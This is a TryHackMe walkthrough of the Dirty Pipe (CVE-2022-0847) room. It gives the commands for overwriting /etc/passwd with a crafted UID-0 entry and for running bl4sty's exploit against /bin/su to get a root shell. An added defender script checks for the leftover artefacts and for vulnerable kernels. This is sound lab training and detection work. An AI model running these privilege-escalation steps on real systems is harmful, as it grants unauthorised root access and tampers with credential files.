Tryhackme - Dirty Pipe: CVE-2022-0847


In this walkthrough, we will be going through the Dirty Pipe: CVE-2022-0847 room from Tryhackme. The room gives an overview of the vulnerability and an opportunity to exploit it ourselves on the vulnerable machine attached to the task. We will start by looking at the vulnerability and the exploit at a high level, before moving on to exploiting the vulnerability in the later sections of the room. So, let’s get started without any delay.


Task 1 – [Info] Introduction and Deploy


Task 2 – [Tutorial] Vulnerability Background

Question 1 – Read the information in the task and understand how Dirty Pipe works.


Task 3 – [Practical] A Weaponised PoC

Question 1 – Follow along with the steps described in the task if you haven’t already done so.

  • Generate a password of your choice using openssl.

openssl passwd -6 --salt THM "PASSWORD"

generating password

  • Put it in the format shown below, which is what the /etc/passwd file requires.

'muiri:$6$THM$MeGI7eYSh.ex3l79m8sMQ2dq9Ux77JfC7XlCgZbneUFAvnHj4gphJKnnveuf2AndcoLn2mmhJVhcxvAIgA8RJ.:0:0::/root:/bin/bash   '

  • Upon checking the password length of the “games” user, it stood out as the best candidate to overwrite, as required by the exploit.

grep -b "games" /etc/passwd
cd ~/Exploit/PoC/
gcc poc.c -o exploit

compiling exploit

  • Execute the exploit and switch user to get root.

 ./exploit /etc/passwd 189 'muiri:$6$THM$MeGI7eYSh.ex3l79m8sMQ2dq9Ux77JfC7XlCgZbneUFAvnHj4gphJKnnveuf2AndcoLn2mmhJVhcxvAIgA8RJ.:0:0::/root:/bin/bash
> '

su muiri

getting root

Question 2 – What is the flag found in the /root/flag.txt file?

root flag

Question 3 – Using your root shell, restore the original /etc/passwd file from your backup.


Task 4 – [Practical] A Second Exploit

Question 1 – Exploit the target using bl4sty’s exploit for Dirty Pipe

cd /home/tryhackme/Exploit/Bl4sty
gcc dirtypipez.c -o exploit
./exploit /bin/su

Second exploit

Question 2 – Remove the SUID binary created by the script (/tmp/sh).

Question 3 – [Optional] Find another exploit for this vulnerability online. Review the code to ensure that it does what it claims to do, then upload it to the target and attempt to exploit the vulnerability a third way.
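Cleanup and detection checks for the two artefacts these tasks leave behind (the extra UID-0 entry written into /etc/passwd in Task 3, and the SUID /tmp/sh from Task 4), plus a kernel version check against the upstream fix releases, as an added example that is not part of the room or of either PoC. The sample passwd content and the placeholder hash are constructed; the version check assumes the upstream fix versions only and does not see distro backports.

```shell
#!/bin/sh
# Added example, not code from the room or from either PoC: defender-side
# checks for what the walkthrough leaves behind (a second UID-0 entry in
# /etc/passwd and an SUID shell in /tmp), plus a kernel version range check.

# Print each /etc/passwd entry (read from stdin) with UID 0 that is not root.
rogue_uid0_entries() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }'
}

# Exit 0 if a kernel version string lies in the CVE-2022-0847 range:
# 5.8 or later, fixed upstream in 5.16.11, 5.15.25 and 5.10.102. Distro
# backports are not visible in the version number, so treat a hit as
# "needs a closer look", not as proof of exposure.
kernel_vulnerable() {
    v=${1%%-*}                                 # strip "-generic" style suffixes
    maj=$(printf '%s' "$v" | cut -d. -f1)
    min=$(printf '%s' "$v" | cut -d. -f2)
    pat=$(printf '%s' "$v" | cut -d. -f3)
    pat=${pat:-0}                              # "5.8" has no patch level
    [ "$maj" -eq 5 ] && [ "$min" -ge 8 ] && [ "$min" -le 16 ] || return 1
    case "$min" in
        16) [ "$pat" -lt 11 ] ;;
        15) [ "$pat" -lt 25 ] ;;
        10) [ "$pat" -lt 102 ] ;;
        *)  return 0 ;;
    esac
}

# List SUID files owned by root under a directory such as /tmp, where the
# second exploit drops its shell.
suid_root_files() {
    find "$1" -xdev -type f -perm -4000 -user root 2>/dev/null
}

# Constructed sample: /etc/passwd after the room's payload has been written
# (the hash is a placeholder, not the one from the walkthrough).
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
games:x:5:60:games:/usr/games:/usr/sbin/nologin
muiri:$6$THM$placeholderhash:0:0::/root:/bin/bash'

printf '%s\n' "$SAMPLE_PASSWD" | rogue_uid0_entries   # prints: muiri
```

On the real box, `rogue_uid0_entries < /etc/passwd`, `suid_root_files /tmp` and `kernel_vulnerable "$(uname -r)"` confirm whether the restore and cleanup questions in Tasks 3 and 4 were actually completed.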


Task 5 – [Info] Conclusion



So that was “Dirty Pipe: CVE-2022-0847” for you. We first had an overview of the vulnerability and then took a deep dive into how the exploit works. We then got hands-on experience in the attached VM and got root. Finally, we looked into an alternate exploit and completed the room. On that note, I will take your leave and meet you in the next one. Till then, “Happy hacking”.
